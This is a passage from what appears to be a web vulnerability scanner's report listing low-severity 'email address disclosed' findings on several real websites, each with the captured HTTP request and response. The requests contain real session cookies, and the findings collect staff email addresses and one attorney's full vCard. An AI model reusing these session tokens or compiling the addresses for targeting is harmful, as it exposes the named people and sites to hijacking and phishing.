Accept: */*

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:24:29 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 15762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/templates/fmHaloLeftNav002.dwt" codeOutsideHTMLIsLocked="fals
...[SNIP]...
<a href="mailto:support@firstmateonline.com">
...[SNIP]...
<a href="mailto:grenada@budgetmarine.com?subject=www.FirstMateOnline.com Inquiry">grenada@budgetmarine.com </a>
...[SNIP]...
<a href="mailto:support@firstmateonline.com">
...[SNIP]...
27.59. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Jolly+Harbour+PO+Box+2077+Saint+John's HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:05:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84033

<!doctype html> <head> <title>Jolly Harbour PO Box 2077 Saint John's - Google Search</title> <script>window.google={kEI:"s2LETeysO86tgQeMtanLBA",kEXPI:"17259,24472,25907,27147,28505,28514,28554
...[SNIP]...
<wbr>5760. Fax: (268) 462-6276 email: paradise@candw.ag <b>
...[SNIP]...
27.60. http://www.gotoassist.com/en_US/pageNotFound.tmpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gotoassist.com
Path:   /en_US/pageNotFound.tmpl

Issue detail

The following email address was disclosed in the response:

Request

GET /en_US/pageNotFound.tmpl HTTP/1.1
Host: www.gotoassist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webVisitor=FirstVisit%3D1304731133576%26LastVisit%3D1304731133576; webSession=SessionInfo%3D12834167%253A0D30141EEEA9EC4

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:35:17 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Content-Length: 7911

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">


       <html>
<head>
   <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
   
...[SNIP]...
<a href="mailto:webmaster@citrixonline.com">
...[SNIP]...
27.61. http://www.gotoassist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gotoassist.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.gotoassist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webVisitor=FirstVisit%3D1304731133576%26LastVisit%3D1304731133576; webSession=SessionInfo%3D12834167%253A0D30141EEEA9EC4

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 07 May 2011 01:34:33 GMT
Server: Apache
Location: http://www.gotoassist.com/en_US/pageNotFound.tmpl
Content-Length: 373
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.gotoassist.c
...[SNIP]...
<a href="mailto:webmaster@citrixonline.com">
...[SNIP]...
27.62. http://www.harrisconnect.com/templates/ja_mageia/ja_menus/ja_cssmenu/mootools.v1.1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harrisconnect.com
Path:   /templates/ja_mageia/ja_menus/ja_cssmenu/mootools.v1.1.js

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/ja_mageia/ja_menus/ja_cssmenu/mootools.v1.1.js HTTP/1.1
Host: www.harrisconnect.com
Proxy-Connection: keep-alive
Referer: http://www.harrisconnect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 59a8502f7c514423253397178054cd73=da12b0af7e5c042dc2036ba0c7ee37f6; JATheme=ja_mageia; ColorCSS=red; ScreenType=wide; FontSize=3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:29:09 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.13
Last-Modified: Thu, 05 Feb 2009 15:04:01 GMT
ETag: "1d5f-2dc45-36e6fa40"
Accept-Ranges: bytes
Content-Length: 187461
Content-Type: application/x-javascript
X-Pad: avoid browser bug

/*------------------------------------------------------------------------
# JA Mageia for Joomla 1.5 - Version 1.4 - Licence Owner JA124349
# -------------------------------------------------------
...[SNIP]...
<input name="email" value="bob@bob.com">
...[SNIP]...
</script>
       (end)

       Returns:
           email=bob@bob.com&zipCode=90210
   */

   toQueryString: function(){
       var queryString = [];
       this.getFormElements().each(function(el){
           var name = el.name;
           var value = el.getValue();
           if (value === false |
...[SNIP]...
<input name="email" value="bob@bob.com">
...[SNIP]...
27.63. http://www.hunton.com/include_common/jQuery/dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /include_common/jQuery/dimensions.js HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304

Response

HTTP/1.1 200 OK
Content-Length: 24543
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:26:57 GMT

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...
27.64. http://www.hunton.com/include_common/jQuery/jqDnR.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/jqDnR.js

Issue detail

The following email address was disclosed in the response:

Request

GET /include_common/jQuery/jqDnR.js HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304

Response

HTTP/1.1 200 OK
Content-Length: 1325
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:26:58 GMT

/*
* jqDnR - Minimalistic Drag'n'Resize for jQuery.
*
* Copyright (c) 2007 Brice Burgess <bhb@iceburg.net>, http://www.iceburg.net
* Licensed under the MIT License:
* http://www.opensource.o
...[SNIP]...
27.65. http://www.hunton.com/load.vcf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /load.vcf

Issue detail

The following email address was disclosed in the response:

Request

GET /load.vcf?type=atty&id=6749bda9-b5a2-45ae-a5bc-0ca5a9401ed3 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:27:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/x-vcard
Content-Length: 381

BEGIN:VCARD
FN:W. Alan Kailer
N:Kailer;W.;Alan;;
ADR;WORK;ENCODING=QUOTED-PRINTABLE:;;Hunton & Williams LLP =0D=0A1445 Ross Avenue, Suite 3700;Dallas;Texas;75202;United States of America
TEL;WORK:214.468.3342
TEL;WORK;FAX:214.740.7136
EMAIL; INTERNET:akailer@hunton.com
URL;WORK:http://www.hunton.com/alan_kailer
TITLE:Partner
ROLE:
ORG:Hunton & Williams LLP
END:VCARD
27.66. http://www.lbmc.com/landing/pci.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmc.com
Path:   /landing/pci.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /landing/pci.htm?gclid=CPPNuPTV1KgCFeM85QodgmKbjA HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:23:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Dec 2008 15:07:08 GMT
ETag: "6a803d-2094-2107df00"
Accept-Ranges: bytes
Content-Length: 8340
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>
LBMC: PCI and Ri
...[SNIP]...
<a href="mailto:tlewis@lbmc.com" style="color: #003366; text-decoration: underline">tlewis@lbmc.com</a>
...[SNIP]...
<a href="mailto:tlewis@lbmc.com" style="color: #003366; text-decoration: underline">tlewis@lbmc.com</a>
...[SNIP]...
<a href="mailto:mfulford@lbmc.com" style="color: #003366; text-decoration: underline">mfulford@lbmc.com</a>
...[SNIP]...
27.67. http://www.lbmc.com/sites/all/modules/extlink/extlink.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmc.com
Path:   /sites/all/modules/extlink/extlink.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/extlink/extlink.js?U HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/about-lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.1.10.1304749048; SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:26:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 May 2010 01:25:56 GMT
ETag: "6011a-1146-27d47100"
Accept-Ranges: bytes
Content-Length: 4422
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:26:05 GMT
Connection: close
Content-Type: application/x-javascript

// $Id: extlink.js,v 1.4.2.12 2010/05/26 01:25:56 quicksketch Exp $
(function ($) {

function extlinkAttach(context) {
// Strip the host name down, removing ports, subdomains, or www.
var pattern
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
27.68. http://www.millersweld.com/top.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millersweld.com
Path:   /top.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /top.php?d=millersweld.com HTTP/1.1
Host: www.millersweld.com
Proxy-Connection: keep-alive
Referer: http://www.millersweld.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=r00990b0n1b9uo8re3ehhh4ie6

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Fri, 06 May 2011 19:10:00 GMT
Server: lighttpd
Content-Length: 2318

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>popup management</title>
<script
...[SNIP]...
<a href="mailto:pbzbjlfhlx@millersweld.com">
...[SNIP]...
<a href="mailto:2915161843_1304709000@millersweld.com">
...[SNIP]...
27.69. http://www.neospire.net/security-and-compliance/PCI-DSS.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neospire.net
Path:   /security-and-compliance/PCI-DSS.php

Issue detail

The following email address was disclosed in the response:

Request

GET /security-and-compliance/PCI-DSS.php?utm_source=Google&utm_medium=ppc&utm_campaign=pci-magic&utm_keyword=%252BPCI%2520%252Bcompliance&gclid=CIbrp9zV1KgCFd8D5QodQ0sogw HTTP/1.1
Host: www.neospire.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:22:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=6083a42a7356a1bdbe27f3e50b8622e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 81911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<h4>Email sales@neospire.net or call 1.888.774.2253</h4>
...[SNIP]...
27.70. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /legal/SSL-legal-repository-rpg.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /legal/SSL-legal-repository-rpg.jsp HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:16:25 GMT
Set-cookie: JSESSIONID=806e2d4caa6cc054763194e76a0a; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=8y5l; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=806e2d4caa6cc054763194e76a0a; Expires=Thu, 25-May-2079 04:30:31 GMT; Path=/
Set-cookie: siteId=46064838-12; Expires=Tue, 01-May-2012 01:16:25 GMT; Path=/
Content-type: text/html;charset=UTF-8
Date: Sat, 07 May 2011 01:16:25 GMT
Vary: accept-encoding
Content-Length: 44952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<head>
<title>Legal | Network Solutions</title>
<meta http-equiv="content-type" conte
...[SNIP]...
<li>You must submit all claims via email to the following email address: sslclaims@networksolutions.com, and you must include: the date of loss, a detailed description of the events and circumstances of the loss, the amount of any claimed loss, the web site URL and Subscriber name through which the loss
...[SNIP]...
27.71. http://www.nutter.com/attorneys.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /attorneys.php?letter=G HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:15:00 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 29605

<!-- attorneys start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="email.php?email=rgallup@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(1, 'true')" onmouseout="colorHover(1)"><span>rgallup@nutter.com</span>
...[SNIP]...
<a href="email.php?email=mgaughan@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(2, 'true')" onmouseout="colorHover(2)"><span>mgaughan@nutter.com</span>
...[SNIP]...
<a href="email.php?email=wgeary@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(3, 'true')" onmouseout="colorHover(3)"><span>wgeary@nutter.com</span>
...[SNIP]...
<a href="email.php?email=aghander@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(4, 'true')" onmouseout="colorHover(4)"><span>aghander@nutter.com</span>
...[SNIP]...
<a href="email.php?email=ggill-austern@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(5, 'true')" onmouseout="colorHover(5)"><span>ggill-austern@nutter.com</span>
...[SNIP]...
<a href="email.php?email=dgleason@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(6, 'true')" onmouseout="colorHover(6)"><span>dgleason@nutter.com</span>
...[SNIP]...
<a href="email.php?email=aglovsky@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(7, 'true')" onmouseout="colorHover(7)"><span>aglovsky@nutter.com</span>
...[SNIP]...
<a href="email.php?email=agolden@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(8, 'true')" onmouseout="colorHover(8)"><span>agolden@nutter.com</span>
...[SNIP]...
<a href="email.php?email=cguizzetti@nutter.com" class="Email" target="emailnotice" onclick="emailNotice();" onmouseover="colorHover(9, 'true')" onmouseout="colorHover(9)"><span>cguizzetti@nutter.com</span>
...[SNIP]...
27.72. http://www.resiteonline.com/resite-login.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resiteonline.com
Path:   /resite-login.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resite-login.js HTTP/1.1
Host: www.resiteonline.com
Proxy-Connection: keep-alive
Referer: http://www.resiteonline.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:58 GMT
Server:
Last-Modified: Wed, 30 Jul 2008 00:24:02 GMT
ETag: "5a40b3-1175-45332c5fcec80"
Accept-Ranges: bytes
Content-Length: 4469
Content-Type: application/javascript


/**
* Add an event w/o hijacking the handler
*/
function addEvent( target, event, method ) {
   if ( target.addEventListener ) {
       target.addEventListener( event, method, false );
   } else if (
...[SNIP]...
<a href="mailto:support@resiteit.com">
...[SNIP]...
<a href="mailto:support@resiteit.com">
...[SNIP]...
27.73. http://www.scmagazineus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%255D%7C1461848369310%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271303995569312%2527%255D%255D%7C1461848369312%3B; __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=drirbgesaxmk42ceg5dgbpib; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
From: Web2-VM
Date: Fri, 06 May 2011 21:49:54 GMT
Content-Length: 78884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:o
...[SNIP]...
<a href="mailto:kathleen.merot@haymarketmedia.com">
...[SNIP]...
27.74. http://www.scmagazineus.com/subscribe/section/122/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /subscribe/section/122/

Issue detail

